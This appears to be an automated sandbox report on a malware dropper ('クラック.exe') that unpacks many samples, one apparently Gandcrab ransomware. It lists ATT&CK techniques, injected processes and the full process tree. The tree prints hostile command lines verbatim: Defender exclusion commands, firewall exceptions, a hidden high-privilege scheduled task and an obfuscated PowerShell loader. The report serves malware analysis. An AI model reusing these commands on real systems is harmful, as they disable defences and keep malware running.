pid	pid_target	process	target process
2924	4048	WerFault.exe	cbgsujmwws.exe
6916	5936	WerFault.exe	78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exeBTZ.exeHappy18.exeクラック.exe31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe938b92958ded4d50a357d22eddf141ad.exewinhlp32.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exeDarkest Dungeon setub.exe2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exeCat.exefwclt.exe7f1630df6b57af024a3b561bdadc208f.exe70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BTZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Happy18.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	クラック.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	938b92958ded4d50a357d22eddf141ad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winhlp32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Darkest Dungeon setub.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fwclt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7f1630df6b57af024a3b561bdadc208f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXEPING.EXE

pid process

5056 PING.EXE
8100 PING.EXE
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4948 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5152 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

8100 PING.EXE
5056 PING.EXE

pid	process
5056	PING.EXE
8100	PING.EXE

pid	process
4948	timeout.exe

pid	process
5152	taskkill.exe

pid	process
8100	PING.EXE
5056	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	process
5836	schtasks.exe
6068	schtasks.exe
6564	schtasks.exe
5468	schtasks.exe
1628	schtasks.exe
6264	schtasks.exe
6940	schtasks.exe
2688	schtasks.exe
7144	schtasks.exe
6960	schtasks.exe
1368	schtasks.exe
3876	schtasks.exe
1804	schtasks.exe
3384	schtasks.exe
7668	schtasks.exe
4668	schtasks.exe
4992	schtasks.exe
4912	schtasks.exe
8180	schtasks.exe
380	schtasks.exe
1252	schtasks.exe
6428	schtasks.exe
2680	schtasks.exe
5212	schtasks.exe
6072	schtasks.exe
5604	schtasks.exe
1596	schtasks.exe
5836	schtasks.exe
5460	schtasks.exe
6128	schtasks.exe
6072	schtasks.exe
2244	schtasks.exe
7056	schtasks.exe
6740	schtasks.exe
4912	schtasks.exe
6596	schtasks.exe
5552	schtasks.exe
5440	schtasks.exe
3696	schtasks.exe
5132	schtasks.exe
720	schtasks.exe
1596	schtasks.exe
3312	schtasks.exe
1776	schtasks.exe
7120	schtasks.exe
248	schtasks.exe
6276	schtasks.exe
7104	schtasks.exe
5196	schtasks.exe
3468	schtasks.exe
5052	schtasks.exe
6984	schtasks.exe
5612	schtasks.exe
6580	schtasks.exe
6360	schtasks.exe
1252	schtasks.exe
7136	schtasks.exe
5804	schtasks.exe
1184	schtasks.exe
4988	schtasks.exe
5432	schtasks.exe
5212	schtasks.exe
6548	schtasks.exe
1780	schtasks.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

5e710462c65fe899466e4fb7c1e33c9a.exe73c1c41b9e71c48e752a5cd19fe808b6.exe

pid	process
1252	5e710462c65fe899466e4fb7c1e33c9a.exe
1252	5e710462c65fe899466e4fb7c1e33c9a.exe
1252	5e710462c65fe899466e4fb7c1e33c9a.exe
2544	73c1c41b9e71c48e752a5cd19fe808b6.exe
2544	73c1c41b9e71c48e752a5cd19fe808b6.exe
2544	73c1c41b9e71c48e752a5cd19fe808b6.exe
2544	73c1c41b9e71c48e752a5cd19fe808b6.exe
2544	73c1c41b9e71c48e752a5cd19fe808b6.exe
2544	73c1c41b9e71c48e752a5cd19fe808b6.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

7f1630df6b57af024a3b561bdadc208f.exe5e710462c65fe899466e4fb7c1e33c9a.exe57ccb6f0bd910fed428761828ae93553.exe73c1c41b9e71c48e752a5cd19fe808b6.exeClient.exe

description	pid	process
Token: SeDebugPrivilege	3884	7f1630df6b57af024a3b561bdadc208f.exe
Token: SeDebugPrivilege	1252	5e710462c65fe899466e4fb7c1e33c9a.exe
Token: SeDebugPrivilege	4584	57ccb6f0bd910fed428761828ae93553.exe
Token: SeDebugPrivilege	2544	73c1c41b9e71c48e752a5cd19fe808b6.exe
Token: SeDebugPrivilege	2304	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

クラック.exe70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe938b92958ded4d50a357d22eddf141ad.exe

description	pid	process	target process
PID 3032 wrote to memory of 644	3032	クラック.exe	2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe
PID 3032 wrote to memory of 644	3032	クラック.exe	2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe
PID 3032 wrote to memory of 644	3032	クラック.exe	2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe
PID 3032 wrote to memory of 1252	3032	クラック.exe	5e710462c65fe899466e4fb7c1e33c9a.exe
PID 3032 wrote to memory of 1252	3032	クラック.exe	5e710462c65fe899466e4fb7c1e33c9a.exe
PID 3032 wrote to memory of 3884	3032	クラック.exe	7f1630df6b57af024a3b561bdadc208f.exe
PID 3032 wrote to memory of 3884	3032	クラック.exe	7f1630df6b57af024a3b561bdadc208f.exe
PID 3032 wrote to memory of 3884	3032	クラック.exe	7f1630df6b57af024a3b561bdadc208f.exe
PID 3032 wrote to memory of 4252	3032	クラック.exe	31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe
PID 3032 wrote to memory of 4252	3032	クラック.exe	31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe
PID 3032 wrote to memory of 4252	3032	クラック.exe	31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe
PID 3032 wrote to memory of 4496	3032	クラック.exe	34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe
PID 3032 wrote to memory of 4496	3032	クラック.exe	34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe
PID 3032 wrote to memory of 4496	3032	クラック.exe	34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe
PID 3032 wrote to memory of 4584	3032	クラック.exe	57ccb6f0bd910fed428761828ae93553.exe
PID 3032 wrote to memory of 4584	3032	クラック.exe	57ccb6f0bd910fed428761828ae93553.exe
PID 3032 wrote to memory of 232	3032	クラック.exe	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
PID 3032 wrote to memory of 232	3032	クラック.exe	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
PID 3032 wrote to memory of 232	3032	クラック.exe	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
PID 3032 wrote to memory of 2544	3032	クラック.exe	73c1c41b9e71c48e752a5cd19fe808b6.exe
PID 3032 wrote to memory of 2544	3032	クラック.exe	73c1c41b9e71c48e752a5cd19fe808b6.exe
PID 3032 wrote to memory of 2336	3032	クラック.exe	75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe
PID 3032 wrote to memory of 2336	3032	クラック.exe	75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe
PID 3032 wrote to memory of 2336	3032	クラック.exe	75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe
PID 3032 wrote to memory of 4300	3032	クラック.exe	78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
PID 3032 wrote to memory of 4300	3032	クラック.exe	78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
PID 3032 wrote to memory of 4300	3032	クラック.exe	78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
PID 3032 wrote to memory of 4120	3032	クラック.exe	938b92958ded4d50a357d22eddf141ad.exe
PID 3032 wrote to memory of 4120	3032	クラック.exe	938b92958ded4d50a357d22eddf141ad.exe
PID 3032 wrote to memory of 4120	3032	クラック.exe	938b92958ded4d50a357d22eddf141ad.exe
PID 232 wrote to memory of 2816	232	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	Powershell.exe
PID 232 wrote to memory of 2816	232	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	Powershell.exe
PID 232 wrote to memory of 2816	232	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	Powershell.exe
PID 4120 wrote to memory of 5088	4120	938b92958ded4d50a357d22eddf141ad.exe	winhlp32.exe
PID 4120 wrote to memory of 5088	4120	938b92958ded4d50a357d22eddf141ad.exe	winhlp32.exe
PID 4120 wrote to memory of 5088	4120	938b92958ded4d50a357d22eddf141ad.exe	winhlp32.exe
PID 3032 wrote to memory of 2348	3032	クラック.exe	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
PID 3032 wrote to memory of 2348	3032	クラック.exe	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
PID 3032 wrote to memory of 2348	3032	クラック.exe	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
PID 3032 wrote to memory of 2888	3032	クラック.exe	Conhost.exe
PID 3032 wrote to memory of 2888	3032	クラック.exe	Conhost.exe
PID 3032 wrote to memory of 912	3032	クラック.exe	BTZ.exe
PID 3032 wrote to memory of 912	3032	クラック.exe	BTZ.exe
PID 3032 wrote to memory of 912	3032	クラック.exe	BTZ.exe
PID 3032 wrote to memory of 4900	3032	クラック.exe	Cat.exe
PID 3032 wrote to memory of 4900	3032	クラック.exe	Cat.exe
PID 3032 wrote to memory of 4900	3032	クラック.exe	Cat.exe
PID 3032 wrote to memory of 2304	3032	クラック.exe	Client.exe
PID 3032 wrote to memory of 2304	3032	クラック.exe	Client.exe
PID 3032 wrote to memory of 3400	3032	クラック.exe	net.exe
PID 3032 wrote to memory of 3400	3032	クラック.exe	net.exe
PID 3032 wrote to memory of 3400	3032	クラック.exe	net.exe
PID 3032 wrote to memory of 4748	3032	クラック.exe	evil.exe
PID 3032 wrote to memory of 4748	3032	クラック.exe	evil.exe
PID 3032 wrote to memory of 4748	3032	クラック.exe	evil.exe
PID 3032 wrote to memory of 3224	3032	クラック.exe	msedge.exe
PID 3032 wrote to memory of 3224	3032	クラック.exe	msedge.exe
PID 3032 wrote to memory of 3224	3032	クラック.exe	msedge.exe
PID 3032 wrote to memory of 1712	3032	クラック.exe	Gandcrab5.0.3.exe
PID 3032 wrote to memory of 1712	3032	クラック.exe	Gandcrab5.0.3.exe
PID 3032 wrote to memory of 1712	3032	クラック.exe	Gandcrab5.0.3.exe
PID 3032 wrote to memory of 3096	3032	クラック.exe	Happy18.exe
PID 3032 wrote to memory of 3096	3032	クラック.exe	Happy18.exe
PID 3032 wrote to memory of 3096	3032	クラック.exe	Happy18.exe

C:\Users\Admin\AppData\Local\Temp\クラック.exe
"C:\Users\Admin\AppData\Local\Temp\クラック.exe"
1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3032
- C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe
  "C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:644
- C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe
  "C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8BKPOrigTy.bat"
    3⤵
    PID:7024
  - - C:\Windows\system32\w32tm.exe
      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
      4⤵
      PID:1776
- C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe
  "C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3884
- C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe
  "C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4252
- - C:\Users\Admin\AppData\Local\Temp\server.exe
    "C:\Users\Admin\AppData\Local\Temp\server.exe"
    3⤵
    PID:8
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:6392
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Exsample.exe
      4⤵
      Kills process with taskkill
      PID:5152
- C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe
  "C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4496
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:760
- C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe
  "C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4584
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5aomklj1\5aomklj1.cmdline"
    3⤵
    PID:2360
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES599.tmp" "c:\Windows\System32\CSCEAA306A8F671430A9EC342A45B61E47E.TMP"
      4⤵
      PID:1952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BrowserCore\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\malecus.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-US\schtasks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IME\IMEKR\HelpPane.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\assembly\WmiPrvSE.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5260
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2888
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BEI28ivDXM.bat"
    3⤵
    PID:232
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:6944
  - - C:\Windows\system32\PING.EXE
      ping -n 10 localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5056
  - - C:\Recovery\WindowsRE\malecus.exe
      "C:\Recovery\WindowsRE\malecus.exe"
      4⤵
      PID:6232
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fx0hj32w\fx0hj32w.cmdline"
        5⤵
        
        PID:4016
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF1CD.tmp" "c:\Windows\BrowserCore\CSCEDAC466F114A4D2FB2F09AB3923D2A56.TMP"
        6⤵
        
        PID:2760
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h3kpiarw\h3kpiarw.cmdline"
        5⤵
        
        PID:4936
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC286416C6E01A4B5EBBA58C779840117E.TMP"
        6⤵
        
        PID:2864
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zsz41cmm\zsz41cmm.cmdline"
        5⤵
        
        PID:8036
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC5.tmp" "c:\Recovery\WindowsRE\CSC9F5C92D8FE5E4171B744C1A3A908EF3.TMP"
        6⤵
        
        PID:4016
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sat3wa2v\sat3wa2v.cmdline"
        5⤵
        
        PID:2468
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2234.tmp" "c:\Program Files\Windows NT\Accessories\en-US\CSC5B114D712E794B0A8E43483AB44453D.TMP"
        6⤵
        
        PID:5468
- C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
  "C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:232
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    "Powershell.exe" -windowstyle minimized "$Teratism249 = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168' ; $Neglefilen=$Teratism249.SubString(69482,3);.$Neglefilen($Teratism249) "
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2816
- C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe
  "C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2544
- - C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe
    "C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe"
    3⤵
    PID:5556
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uLA7epbaGq.bat"
      4⤵
      PID:7064
    - - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        5⤵
        
        PID:1368
    - - C:\Program Files\Internet Explorer\images\BTZ.exe
        
        "C:\Program Files\Internet Explorer\images\BTZ.exe"
        5⤵
        
        PID:7244
- C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe
  "C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2336
- C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
  "C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4300
- - C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
    "C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"
    3⤵
    PID:5936
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 392
      4⤵
      Program crash
      PID:6916
- C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe
  "C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4120
- - C:\Windows\winhlp32.exe
    winhlp32.exe -x
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5088
- - C:\Windows\winhlp32.exe
    winhlp32.exe -x
    3⤵
    PID:4188
- C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
  "C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2348
- C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe
  "C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe"
  2⤵
  - Executes dropped EXE
  PID:2888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\cbgsujmwws.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\Happy18.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\57ccb6f0bd910fed428761828ae93553.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\HelpPane.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4680
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\K0ClJfAvjH.bat"
    3⤵
    PID:4672
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:7316
  - - C:\Windows\system32\PING.EXE
      ping -n 10 localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:8100
  - - C:\Users\Default User\HelpPane.exe
      "C:\Users\Default User\HelpPane.exe"
      4⤵
      PID:7564
- C:\Program Files (x86)\BTZ.exe
  "C:\Program Files (x86)\BTZ.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Impair Defenses: Safe Mode Boot
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:912
- C:\Program Files (x86)\Cat.exe
  "C:\Program Files (x86)\Cat.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4900
- C:\Program Files (x86)\Client.exe
  "C:\Program Files (x86)\Client.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2304
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit
    3⤵
    PID:3232
  - - C:\Windows\system32\schtasks.exe
